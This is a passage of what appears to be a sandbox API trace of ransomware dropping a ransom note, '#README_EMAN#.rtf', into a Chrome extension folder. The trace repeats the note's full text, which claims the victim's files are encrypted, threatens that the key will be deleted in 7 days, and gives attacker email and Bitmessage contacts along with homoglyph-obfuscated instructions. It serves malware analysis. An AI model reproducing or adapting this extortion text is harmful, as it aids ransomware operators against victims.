}}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÏ^êB95-", lpUsedDefaultChar=0x0) returned 8717 [0288.030] WriteFile (in: hFile=0x294, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0288.031] CloseHandle (hObject=0x294) returned 1 [0288.031] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\#readme_eman#.rtf")) returned 0xffffffff [0288.031] GetLastError () returned 0x2 [0288.031] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0288.060] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0288.060] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 